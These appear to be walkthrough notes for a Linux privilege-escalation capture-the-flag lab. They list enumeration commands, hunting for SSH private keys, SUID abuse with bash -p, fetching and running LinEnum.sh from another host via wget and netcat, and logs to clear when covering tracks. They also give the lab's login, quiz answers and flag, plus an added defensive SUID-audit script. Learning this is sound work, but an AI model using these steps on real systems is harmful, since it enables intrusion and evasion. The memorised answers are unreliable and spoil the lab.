The Rogue Gnome
Networking - Priv Esc
Video
Resources
DVWA (Damn Vulnerable Web App)
whoami
name of the account
echo $0
our shell
python -c 'import pty; pty.spawn("/bin/bash")'
spawn another shell and make it interactive
We're using find to search the whole volume, starting at the root (/), for files named "id_rsa", which is the name used for private SSH keys. Appending 2> /dev/null discards error messages so that only matches are shown to us.
find / -name id_rsa 2> /dev/null
The "Priv Esc Checklist"
Determining the kernel of the machine (kernel exploitation such as Dirtyc0w)
Locating other services running or applications installed that may be abusable (SUID & out of date software)
Looking for automated scripts like backup scripts (exploiting crontabs)
Credentials (user accounts, application config files..)
Mis-configured file and directory permissions
Cheatsheets
SUID 101
find / -perm -u=s -type f 2>/dev/null
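A defender's counterpart to the find command above, as an added example that is not part of the original notes: it lists setuid files under a directory and grades each one against two name lists. The function name audit_suid and both lists are assumptions made for illustration, not a vetted baseline; it relies on GNU find and stat.

```shell
#!/usr/bin/env bash
# Added example: audit a directory tree for setuid files and grade each hit.
# Usage: source this file, then run e.g.  audit_suid /

# Setuid binaries commonly expected on a Linux host (constructed list; tune per host).
SUID_ALLOWLIST="passwd su sudo mount umount chsh chfn newgrp gpasswd ping"
# Shells and interpreters that should never carry the setuid bit (constructed list).
SUID_NEVER="sh bash dash zsh ksh python python3 perl ruby find vim nano"

# audit_suid ROOT
# Prints one line per setuid regular file: "<SEVERITY> <owner> <mode> <path>"
#   OK        name is on the allowlist
#   REVIEW    name is unknown and needs a human decision
#   CRITICAL  name is a shell or interpreter
audit_suid() {
    local root="${1:-/}" path name sev
    # -xdev stays on one filesystem; -perm -4000 matches the setuid bit (same as -u=s).
    find "$root" -xdev -type f -perm -4000 -print 2>/dev/null | sort |
    while IFS= read -r path; do
        name=$(basename "$path")
        sev="REVIEW"
        case " $SUID_ALLOWLIST " in *" $name "*) sev="OK" ;; esac
        # The never-list wins, even if someone also allowlisted the name.
        case " $SUID_NEVER " in *" $name "*) sev="CRITICAL" ;; esac
        printf '%s %s %s\n' "$sev" "$(stat -c '%U %a' "$path")" "$path"
    done
}
```

Anything graded CRITICAL or REVIEW can have the bit removed with chmod u-s once it is confirmed to be unneeded.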
Enumeration Scripts
Transfer Scripts
python3 -m http.server 8080
nc -l -p 1337 > LinEnum.sh
nc -w 3 10.10.6.64 1337 < LinEnum.sh
Covering our Tracks
"/var/log/auth.log" (attempted logins for SSH, and changes to or logins as system users)
"/var/log/syslog" (system events such as firewall alerts)
"/var/log/<service>/" (for example "/var/log/apache2/access.log")
Challenge
What type of privilege escalation involves using a user account to execute commands as an administrator?
vertical
What is the name of the file that contains a list of users who are a part of the sudo group?
sudoers
Use SSH to log in to the vulnerable machine like so: ssh cmnatic@10.10.6.64
Input the following password when prompted: aoc2020

No answer needed
Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
You may find uploading some of the enumeration scripts that were used during today's task to be useful.
wget 10.14.4.204:8080/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh


https://gtfobins.github.io/gtfobins/bash/
bash -p

No answer needed
Use this executable to launch a system shell as root.
What are the contents of the file located at /root/flag.txt?
cat /root/flag.txt

thm{2fb10afe933296592}